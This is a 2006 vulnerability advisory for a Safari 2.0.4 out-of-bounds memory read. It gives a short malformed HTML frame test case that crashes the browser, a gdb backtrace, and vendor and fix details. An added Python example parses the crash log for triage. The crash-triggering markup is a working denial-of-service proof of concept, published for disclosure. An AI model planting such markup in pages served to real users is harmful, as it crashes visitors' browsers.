Apple OSX Safari 2.0.4 Out-of-Bounds Memory Read
Release Date:
November 28th, 2006
Severity:
Medium
Vendor:
Apple
Versions Affected:
OSX 10.4.8
Safari 2.0.4 (419.3)
Versions Not Affected:
WebKit build 17902
Overview:
An out-of-bounds memory read vulnerability exists in Safari 2.0.4 and all prior versions. It allows an attacker who posts a specially crafted .html page to crash the application when the page is loaded.
Technical Details:
Below is a basic test case to reproduce this issue (the opening angle brackets were lost in extraction and are restored here; the tag names and attribute values are as published):
<TABLE >
<FRAME SCROLLING= NAME=TOMFERRIS SRC= SCROLLING= >
<FRAMESET >
Below is the crash triggered on OSX 10.4.8 with Safari 2.0.4 (419.3):
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000344
0x90a4e380 in objc_msgSend ()
(gdb) bt
#0 0x90a4e380 in objc_msgSend ()
#1 0x1633f2f0 in ?? ()
#2 0x9524b1b7 in -[WebMainResourceClient receivedError:] ()
#3 0x9524b00d in -[WebBaseResourceHandleDelegate connection:didFailWithError:] ()
#4 0x927b2d7e in -[NSURLConnection(NSURLConnectionInternal) _sendDidFailCallback] ()
#5 0x9278db15 in -[NSURLConnection(NSURLConnectionInternal) _sendCallbacks] ()
#6 0x9278d7b3 in _sendCallbacks ()
#7 0x90823379 in CFRunLoopRunSpecific ()
#8 0x90822eb5 in CFRunLoopRunInMode ()
#9 0x92f02b90 in RunCurrentEventLoopInMode ()
#10 0x92f02297 in ReceiveNextEventCommon ()
#11 0x92f020ee in BlockUntilNextEventMatchingListInMode ()
#12 0x933a3771 in _DPSNextEvent ()
== snip ==
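The backtrace above is the kind of artefact a triage engineer receives first: a fault in objc_msgSend at a very small absolute address (0x344), reached from -[WebMainResourceClient receivedError:]. The following is an added example, not code from the advisory or from Apple/WebKit, that parses a gdb crash log of this shape into a structured summary and applies a simple, labelled heuristic: a faulting address below a small threshold is almost always NULL plus a field offset, i.e. a message sent to a null or already-freed object pointer, which normally means a denial-of-service crash rather than a controllable read. The log text is the advisory's own output pasted as a constructed string; the regexes, the 0x1000 threshold and the category names are assumptions of this example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: the gdb session from the advisory, embedded as a string.
CRASH_LOG = """\
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000344
0x90a4e380 in objc_msgSend ()
(gdb) bt
#0 0x90a4e380 in objc_msgSend ()
#1 0x1633f2f0 in ?? ()
#2 0x9524b1b7 in -[WebMainResourceClient receivedError:] ()
#3 0x9524b00d in -[WebBaseResourceHandleDelegate connection:didFailWithError:] ()
#4 0x927b2d7e in -[NSURLConnection(NSURLConnectionInternal) _sendDidFailCallback] ()
"""

# Assumed line shapes for gdb on OS X of this era; adjust if your debugger differs.
SIGNAL_RE = re.compile(r"Program received signal (\w+)")
REASON_RE = re.compile(r"Reason: (\w+) at address: (0x[0-9a-fA-F]+)")
FRAME_RE = re.compile(r"^#(\d+)\s+(0x[0-9a-fA-F]+) in (.+?) \(\)\s*$")


@dataclass
class CrashSummary:
    signal: Optional[str] = None
    reason: Optional[str] = None
    fault_address: Optional[int] = None
    frames: List[str] = field(default_factory=list)  # symbol names, frame #0 first

    def first_named_frame(self) -> Optional[str]:
        """First caller above frame #0 that has a symbol (skips '??' frames)."""
        for name in self.frames[1:]:
            if name != "??":
                return name
        return None

    def classify(self, near_null_limit: int = 0x1000) -> str:
        """Heuristic bucket for the faulting address (threshold is an assumption)."""
        if self.signal != "EXC_BAD_ACCESS" or self.fault_address is None:
            return "unknown"
        if self.fault_address < near_null_limit:
            # Tiny absolute address: NULL (or a zeroed/freed object pointer) plus a
            # field offset. Typically a crash, not a read the attacker can steer.
            return "near-null-read"
        return "wild-read"


def parse_gdb_crash(log: str) -> CrashSummary:
    """Extract signal, fault reason/address and backtrace symbols from gdb output."""
    summary = CrashSummary()
    for raw in log.splitlines():
        line = raw.strip()
        if (m := SIGNAL_RE.search(line)):
            summary.signal = m.group(1)
        elif (m := REASON_RE.search(line)):
            summary.reason = m.group(1)
            summary.fault_address = int(m.group(2), 16)
        elif (m := FRAME_RE.match(line)):
            summary.frames.append(m.group(3))
    return summary


def triage(log: str) -> dict:
    """One-shot helper returning the fields a bug tracker entry would want."""
    s = parse_gdb_crash(log)
    return {
        "signal": s.signal,
        "reason": s.reason,
        "fault_address": s.fault_address,
        "faulting_function": s.frames[0] if s.frames else None,
        "first_named_caller": s.first_named_frame(),
        "category": s.classify(),
    }


if __name__ == "__main__":
    for key, value in triage(CRASH_LOG).items():
        print(f"{key}: {value:#x}" if isinstance(value, int) else f"{key}: {value}")
```

On the advisory's log this yields the near-null bucket with objc_msgSend as the faulting function and -[WebMainResourceClient receivedError:] as the first symbolised caller, which is consistent with the advisory's Medium severity: the crash is reproducible, but the log alone gives no sign that the faulting address is attacker-controlled.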
Vendor Status:
09/05/2006 - Vendor notified
Solution:
Apple Security Update 2006-007 fixes this issue.
Discovered by:
Tom Ferris
tommy[at]security-protocols[dot]com
Related Links:
http://security-protocols.com/poc/sp-x38.html
http://security-protocols.com/sp-x38-advisory.php
http://nightly.webkit.org
http://apple.com